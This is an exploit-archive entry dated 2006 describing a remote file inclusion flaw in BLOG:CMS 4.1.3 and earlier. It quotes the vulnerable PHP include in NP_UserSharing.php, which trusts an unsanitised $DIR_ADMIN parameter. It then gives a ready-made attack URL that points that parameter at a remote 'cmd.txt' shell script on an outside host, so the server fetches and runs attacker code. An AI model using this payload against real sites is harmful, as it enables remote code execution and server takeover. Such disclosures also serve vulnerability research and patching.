BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability
# Published : 2006-12-12
# Author : HACKERS PAL
# Previous Title : mxBB Module mx_modsdb 1.0 Remote File Include Vulnerability
# Next Title : mxBB Module kb_mods <= 2.0.2 Remote Inclusion Vulnerabilities

BLOG:CMS Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

global $DIR_ADMIN;
include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php");

http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin

# www.Syue.com [2006-12-12]